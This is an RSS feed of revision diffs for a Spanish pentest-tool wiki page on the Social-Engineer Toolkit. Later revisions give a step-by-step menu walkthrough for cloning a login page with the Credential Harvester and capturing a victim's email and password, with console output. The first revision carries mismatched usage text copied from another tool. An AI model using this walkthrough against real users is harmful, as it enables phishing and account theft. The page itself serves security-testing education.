https://sourceforge.net/p/maguey/wiki/SET-es/Recent changes to SET-esenThu, 12 Dec 2013 16:13:22 -0000https://sourceforge.net/p/maguey/wiki/SET-es/<div class="markdown_content"><pre></pre> </div>MagueyThu, 12 Dec 2013 16:13:22 -0000https://sourceforge.nete14e88690587a652b99a651ace2b7d2cbfbf0119https://sourceforge.net/p/maguey/wiki/SET-es/<div class="markdown_content"><pre>--- v5 +++ v6 @@ -1,6 +1,8 @@ <!-- ###################################### SPANISH VERSION ###################################### --> - -<div id="link" style="text-align: right;"><p><a href="https://sourceforge.net/p/maguey/wiki/SET-en" style="color: #4CAB68; text-decoration: underline;">English</a></p></div> +[[img src=https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png height=25% width=25% style=float:right]] +<br /><br /> + +<div id="link" style="text-align: right;"><p><a href="https://sourceforge.net/p/maguey/wiki/Toolset-es/" style="color: #4CAB68; text-decoration: underline;">Regresar</a>&nbsp;&nbsp;<a href="https://sourceforge.net/p/maguey/wiki/SET-en" style="color: #4CAB68; text-decoration: underline;">English</a></p></div> <h1 style="color: #4CAB68;">SET</h1> </pre> </div>MagueyThu, 12 Dec 2013 16:11:52 -0000https://sourceforge.netc10f90a7d32d02bcc1248353d41c958707533535https://sourceforge.net/p/maguey/wiki/SET-es/<div class="markdown_content"><pre>--- v4 +++ v5 @@ -176,7 +176,7 @@ <br /> -La URL de explotación se conforma de la siguiente manera: http://IP_PROPORCIONADA/index.html +La URL de explotación se conforma de la siguiente manera: http:// IP_PROPORCIONADA/index.html Cuando la herramienta identifica una conexión a la página que fue clonada, muestra un aviso en la consola. </pre> </div>MagueyWed, 04 Dec 2013 22:32:24 -0000https://sourceforge.net6152cc76daf6bbadbd857dd209420f763ae42924https://sourceforge.net/p/maguey/wiki/SET-es/<div class="markdown_content"><pre></pre> </div>MagueyWed, 04 Dec 2013 22:31:07 -0000https://sourceforge.net008a068c951da6400114badb916580fdb5da13bahttps://sourceforge.net/p/maguey/wiki/SET-es/<div class="markdown_content"><pre>--- v2 +++ v3 @@ -176,14 +176,44 @@ <br /> - - - +La URL de explotación se conforma de la siguiente manera: http://IP_PROPORCIONADA/index.html + +Cuando la herramienta identifica una conexión a la página que fue clonada, muestra un aviso en la consola. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + +IP_USUARIO - - [14/Nov/2013 16:43:15] "GET / HTTP/1.1" 200 -<br /> + +</div><br /> + +El usuario que ingresa a la página, llena el formulario de acceso con sus credenciales y presiona el botón de para ingresar. Entonces la herramienta captura el request HTTP y lo muestra en consola. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + +[*] WE GOT A HIT! Printing the output:<br /> +PARAM: lsd=AVpgu8gq<br /> +PARAM: display=<br /> +PARAM: enable_profile_selector=<br /> +PARAM: legacy_return=1<br /> +PARAM: profile_selector_ids=<br /> +PARAM: trynum=1<br /> +PARAM: timezone=360<br /> +PARAM: lgnrnd=144204_hbWo<br /> +PARAM: lgnjs=1384469624<br /> +POSSIBLE USERNAME FIELD FOUND: email= usuario@hotmail.com<br /> +POSSIBLE PASSWORD FIELD FOUND: pass= micontrasena12345<br /> +PARAM: persistent=1<br /> +PARAM: default_persistent=0<br /> +[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. + +</div><br /> + +Finalmente detenemos la página Web clonada con la combinación de teclas Ctrl + C. <!-- ********************** RESOURCES ********************** --> <h3 style="color: #4CAB68;">Referencias:</h3> -<b>Liga:</b> http://sourceforge.net/projects/gamja/ -<b>Autor (es):</b> Sang-hun Jeon -<b>Contacto:</b> p4ssion \[at\] gmail.com -<b>Licencia:</b> GNU General Public License version 2.0 (GPLv2) +<b>Liga:</b> https://www.trustedsec.com/downloads/social-engineer-toolkit/ +<b>Autor (es):</b> David Kennedy +<b>Contacto:</b> irc.freenode.net canal #setoolkit +<b>Licencia:</b> BSD licensing </pre> </div>MagueyWed, 04 Dec 2013 22:30:33 -0000https://sourceforge.netac3742a80e01e47cc903247bb883bd9e593c6ee3https://sourceforge.net/p/maguey/wiki/SET-es/<div class="markdown_content"><pre>--- v1 +++ v2 @@ -51,28 +51,133 @@ <!-- ********************** USAGE ********************** --> <h3 style="color: #4CAB68;">Uso básico:</h3> -<b>Realizar un escaneo a una aplicación Web. </b>El siguiente comando inicia el escaneo a una aplicación Web. +<b>Realizar un ataque de clonación de un sitio Web para obtener credenciales de acceso de un usuario. </b>El siguiente comando inicia el menú principal de la herramienta. <div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> -./perl gamja.pl -v [URL] +./set </div><br /> -<p> -Dónde: -<ul> -<li>URL: URL de la aplicación Web. -</li><li>-v: Modo detallado. -</li></ul> -</p> +La herramienta lanza el menú principal, a partir de aquí todo consiste en seleccionar una opción e introducir datos que se soliciten, como son: ip local, URL de sitio a clonar, mensajes informativos, por mencionar algunos. -La herramienta comienza a realizar el escaneo corriendo el proceso en segundo plano. Cuando la herramienta finaliza mostrara el mensaje de completado (<i>+Done</i>). +Elegir la opción número uno Social-Engineering Attacks. -<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> -http://midominio/miaplicacion/.<br /> -[1]+ Done gedit gamja.pl<br /> +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> +Select from the menu: + + 1) Social-Engineering Attacks<br /> + 2) Fast-Track Penetration Testing<br /> + 3) Third Party Modules<br /> + 4) Update the Metasploit Framework<br /> + 5) Update the Social-Engineer Toolkit<br /> + 6) Update SET configuration<br /> + 7) Help, Credits, and About + + 99) Exit the Social-Engineer Toolkit + </div><br /> -Ejemplo de reporte: +A continuación elegir la opción número dos Website Attack Vectors. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + +Select from the menu:<br /> +<br /> + 1) Spear-Phishing Attack Vectors<br /> + 2) Website Attack Vectors<br /> + 3) Infectious Media Generator<br /> + 4) Create a Payload and Listener<br /> + 5) Mass Mailer Attack<br /> + 6) Arduino-Based Attack Vector<br /> + 7) SMS Spoofing Attack Vector<br /> + 8) Wireless Access Point Attack Vector<br /> + 9) QRCode Generator Attack Vector<br /> + 10) Powershell Attack Vectors<br /> + 11) Third Party Modules<br /> +<br /> + 99) Return back to the main menu. + +</div><br /> + +Ahora para recolectar credenciales de un usuario elegir el vector de ataque Credential Harvester Attack Method, opción número tres. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + + 1) Java Applet Attack Method<br /> + 2) Metasploit Browser Exploit Method<br /> + 3) Credential Harvester Attack Method<br /> + 4) Tabnabbing Attack Method<br /> + 5) Man Left in the Mtiddle Attack Method<br /> + 6) Web Jacking Attack Method<br /> + 7) Multi-Attack Web Method<br /> + 8) Create or import a CodeSigning Certificate + + 99) Return to Main Menu + +</div><br /> + +Elija el modo Site Cloner, opción número dos, esta opción permite indicar cualquier página Web que al usuario le resulte familiar, con el fin de abusar de la confianza que tenga el usuario en el sitio clonado. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + + 1) Web Templates<br /> + 2) Site Cloner<br /> + 3) Custom Import<br /> +<br /> + 99) Return to Webattack Menu + +</div><br /> + +Proporcionar la IP de la maquina donde la herramienta regresará las credenciales que logre capturar. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + +set:Webattack>2<br /> +[-] Credential harvester will allow you to utilize the clone capabilities within SET<br /> +[-] to harvest credentials or parameters from a Website as well as place them into a report<br /> +[-] This option is used for what IP the server will POST to.<br /> +[-] If you're using an external IP, use your external IP for this<br /> +set:Webattack> IP address for the POST back in Harvester/Tabnabbing: 127.0.0.1 + +</div><br /> + +Proporcionar la URL de la página que se clonará para recolectar las credenciales del usuario víctima. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + +[-] Example: http://www.thisisafakesite.com<br /> +set:Webattack> Enter the url to clone: URL_A_CLONAR. + +</div><br /> + +La herramienta comienza el proceso para clonación de la página Web que se indicó en el paso anterior. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + +[*] Cloning the Website: https://login.url.com/login.php<br /> +[*] This could take a little bit...<br /> +<br /> +The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a Website.<br /> +[*] Social-Engineer Toolkit Credential Harvester Attack<br /> +[*] Credential Harvester is running on port 80<br /> + +</div><br /> + +En caso de que el servicio de Apache este corriendo, la herramienta solicita confirmación para detenerlo. Detiene el servicio Apache, pública la página Web que clono en el puerto 80 y queda en espera de que una usuario accese a a sito fraudulento. + +<div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> + +[*] Information will be displayed to you as it arrives below:<br /> +[*] Looks like the Web_server can't bind to 80. Are you running Apache?<br /> +Do you want to attempt to disable Apache? [y/n]: y<br /> + * Stopping Web server <br />apache2 <br /> apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName<br /> + ... waiting <br /> [ OK ]<br /> +[*] Successfully stopped Apache. Starting the credential harvester.<br /> +[*] Harvester is ready, have victim browse to your site. + +</div><br /> + + + <!-- ********************** RESOURCES ********************** --> </div></pre> </div>MagueyWed, 04 Dec 2013 22:28:24 -0000https://sourceforge.net8204be0ec4e06de102aa8062270f95eed574cc44https://sourceforge.net/p/maguey/wiki/SET-es/<div class="markdown_content"><!-- ###################################### SPANISH VERSION ###################################### --> <div id="link" style="text-align: right;"><p><a href="https://sourceforge.net/p/maguey/wiki/SET-en" style="color: #4CAB68; text-decoration: underline;">English</a></p></div> <h1 style="color: #4CAB68;">SET</h1> <!-- ********************** PHASES ********************** --> <h3 style="color: #4CAB68;">Fase(s):</h3> <p>Principal: Descubrimiento.<br /> Secundaria: N/A.</p> <!-- ********************** DESCRIPTION ********************** --> <h3 style="color: #4CAB68;">Descripción:</h3> <p>SET, por sus siglas en ingles <i>Social Engineer Toolkit</i>, es una herramienta cuyo fin principal es el ayudar a explotar vulnerabilidades de una aplicación Web con base en el "factor humano". Utiliza técnicas de ingeniería social para lograr ataques exitosos. </p> <!-- ********************** OBJECTIVE ********************** --> <h3 style="color: #4CAB68;">Objetivo:</h3> <ul> <li>Obtener información sensible de un usuario. </li><li>Obtener acceso al equipo de un usuario. </li></ul> <!-- ********************** FEATURES ********************** --> <h3 style="color: #4CAB68;">Funcionalidades:</h3> <p><b>Tecnologías soportadas:</b> Aplicaciones Web (HTTP). </p> <p><b>Modo de ejecución:</b> Activo.</p> <p> Obtener información sensible de un usuario. <ul> <li>Ofrece distintos tipos de ataque para obtener información sensible de un usuario como credenciales de acceso. </li><li>Ofrece los siguientes tipos de ataques sociales: <i>Java Applet Attack Method, Metasploit Browser Exploit Method, Credential Harvester Attack Method, Tabnabbing Attack Method, Man Left in the Mtiddle Attack Method, Web Jacking Attack Method </i>, por mencionar algunos. </li></ul> </p> <p> Obtener acceso al equipo un usuario. <ul> <li>Permite obtener acceso a la máquina de un usuario permitiendo ejecutar comandos de sistema con el fin de obtener información, crear puertas traseras, entre otros. </li></ul> </p> <p> <b>Reportes:</b><br /> Resultados exportables: <span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;">X</span> </p> <!-- ********************** USAGE ********************** --> <h3 style="color: #4CAB68;">Uso básico:</h3> <p><b>Realizar un escaneo a una aplicación Web. </b>El siguiente comando inicia el escaneo a una aplicación Web.</p> <div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> ./perl gamja.pl -v [URL] </div> <p><br /></p> <p> Dónde: <ul> <li>URL: URL de la aplicación Web. </li><li>-v: Modo detallado. </li></ul> </p> <p>La herramienta comienza a realizar el escaneo corriendo el proceso en segundo plano. Cuando la herramienta finaliza mostrara el mensaje de completado (<i>+Done</i>). </p> <div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"> http://midominio/miaplicacion/.<br /> [1]+ Done gedit gamja.pl<br /> </div> <p><br /></p> <p>Ejemplo de reporte:</p> <!-- ********************** RESOURCES ********************** --> <h3 style="color: #4CAB68;">Referencias:</h3> <p><b>Liga:</b> <a href="http://sourceforge.net/projects/gamja/">http://sourceforge.net/projects/gamja/</a><br /> <b>Autor (es):</b> Sang-hun Jeon<br /> <b>Contacto:</b> p4ssion [at] gmail.com<br /> <b>Licencia:</b> GNU General Public License version 2.0 (GPLv2)</p></div>MagueyWed, 04 Dec 2013 22:23:02 -0000https://sourceforge.net2d64b747cb850a9d8414eea65d247c6a0bc62beb